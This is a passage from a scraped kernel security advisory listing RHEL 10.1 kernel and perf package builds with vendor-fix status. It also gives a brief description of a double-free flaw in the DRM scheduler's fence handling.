| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-devel-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-doc-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:libperf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rtla-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-10.1.Z:rv-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the kernel subsystem handling of the DRM scheduler. Under certain error conditions, the function drm_sched_job_add_dependency() consumes a fence reference and then later erroneously attempts to free it again (double free). This may lead to memory corruption and, in some configurations, escalation of privileges.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.39.1.el10_1.noarch | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.39.1.el10_1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
